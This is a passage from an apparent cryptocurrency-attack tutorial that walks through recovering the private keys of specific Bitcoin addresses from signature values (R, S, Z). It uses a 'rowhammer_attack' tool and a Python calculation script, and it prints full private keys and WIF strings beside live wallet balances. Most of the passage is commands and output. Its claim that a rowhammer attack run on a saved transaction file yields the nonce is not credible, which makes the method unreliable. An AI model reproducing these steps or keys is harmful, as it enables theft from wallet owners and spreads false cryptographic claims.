K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script computes the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Run the script:
python3 calculate.py

PrivKey = e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf
Open bitaddress and check:
ADDR: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
WIF: L54WQgCucvc7HCQvYSKnKgiqMUXXXvPxEYZbpxFWTeqQQTuAsqhH
HEX: e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf

Private key found!

www.blockchain.com/btc/address/17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
BALANCE: $ 679.53
№5
Through detailed cryptanalysis, we also found a critical vulnerability in the Bitcoin address:
18vXv21kk8PfN4KRX5i19QvDRM855qheQ


Prepare the RawTX for the attack
18vXv21kk8PfN4KRX5i19QvDRM855qheQ

RawTX = 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Now we need to get all R, S, Z values from all vulnerable transactions.
Let's use the breakECDSA.py script:
python2 breakECDSA.py 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6
To obtain the secret key from the vulnerable ECDSA-signed transaction, add the RawTX data to a text document and save it as the file RawTX.txt:
010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Run -tool rowhammer_attack using the “ATTACKSAFE SOFTWARE”:
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We ran this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt.
To see the result, open the file SecretKey.txt:
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
RawTX = 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
The SecretKey value in HEX format is our secret key "K" (NONCE):
K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
Let's verify this with the Python script point2gen.py, which uses the ECPy elliptic curve library.
Run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be

(0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935 , 0xb05023fec1068addab6d25f08d358e6f25edd83094ac730dcb7124ef3f662af7)
EC (secp256k1)
Check the coordinates of the point against the signature value R:
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
point2gen = (0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935 , 0xb05023fec1068addab6d25f08d358e6f25edd83094ac730dcb7124ef3f662af7)
ALL CORRECT!
K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
Now that we know the secret key, we can obtain the private key of the Bitcoin wallet: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
Let's use the Python script calculate.py to get the private key.
Open the code and add all the signature values K, R, S, Z:
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")
def extended_gcd(aa, bb):
    # Extended Euclid: returns (g, x, y) with aa*x + bb*y == g
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
    # Modular inverse of a modulo m; fails when gcd(a, m) != 1
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script computes the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Run the script:
python3 calculate.py

PrivKey = f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566
Open bitaddress and check:
ADDR: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
WIF: L5UYkyYNJDaJTrTZdgWUjPBx1EdgSCjoqxLdqgnQvmcAqMVZnQUh
HEX: f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566

Private key found!

www.blockchain.com/btc/address/18vXv21kk8PfN4KRX5i19QvDRM855qheQ
BALANCE: $ 683.49
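The potential threat of losing BTC coins lies in a critical vulnerability in the Bitcoin blockchain transaction, so we strongly recommend that everyone always update their software and use only verified devices.
Through detailed cryptanalysis, we also found a critical vulnerability for the same Bitcoin address in TXID 15002f0dc4d2b3f747da8f24a2b994fd86d47db29f682204929c66d7bd52cd42: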
Prepare the RawTX for the attack
18vXv21kk8PfN4KRX5i19QvDRM855qheQ

RawTX = 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
Now we need to get all R, S, Z values from all vulnerable transactions.
Let's use the breakECDSA.py script:
python2 breakECDSA.py 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000

R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c
To obtain the secret key from the vulnerable ECDSA-signed transaction, add the RawTX data to a text document and save it as the file RawTX.txt:
0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
Run -tool rowhammer_attack using the “ATTACKSAFE SOFTWARE”:
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We ran this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt.
To see the result, open the file SecretKey.txt:
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
RawTX = 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
The SecretKey value in HEX format is our secret key "K" (NONCE):
K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
Let's verify this with the Python script point2gen.py, which uses the ECPy elliptic curve library.
Run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d

(0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a , 0x86fe84a8fe36d81088a807db2ff8e7b810cf0104118c527bc06d36dd1688befd)
EC (secp256k1)
Check the coordinates of the point against the signature value R:
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
point2gen = (0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a , 0x86fe84a8fe36d81088a807db2ff8e7b810cf0104118c527bc06d36dd1688befd)
ALL CORRECT!
K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
Now that we know the secret key, we can obtain the private key of the Bitcoin wallet: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
Let's use the Python script calculate.py to get the private key.
Open the code and add all the signature values K, R, S, Z:
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")
def extended_gcd(aa, bb):
    # Extended Euclid: returns (g, x, y) with aa*x + bb*y == g
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
    # Modular inverse of a modulo m; fails when gcd(a, m) != 1
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script computes the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Run the script:
python3 calculate.py

PrivKey = f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566
Open bitaddress and check:
ADDR: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
WIF: L5UYkyYNJDaJTrTZdgWUjPBx1EdgSCjoqxLdqgnQvmcAqMVZnQUh
HEX: f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566

Private key found!

www.blockchain.com/btc/address/18vXv21kk8PfN4KRX5i19QvDRM855qheQ
BALANCE: $ 683.49
Telegram: https://t.me/cryptodeeptech
Video material: https://youtu.be/lfYPcXPzLjE
Source: https://cryptodeep.ru/rowhammer-attack
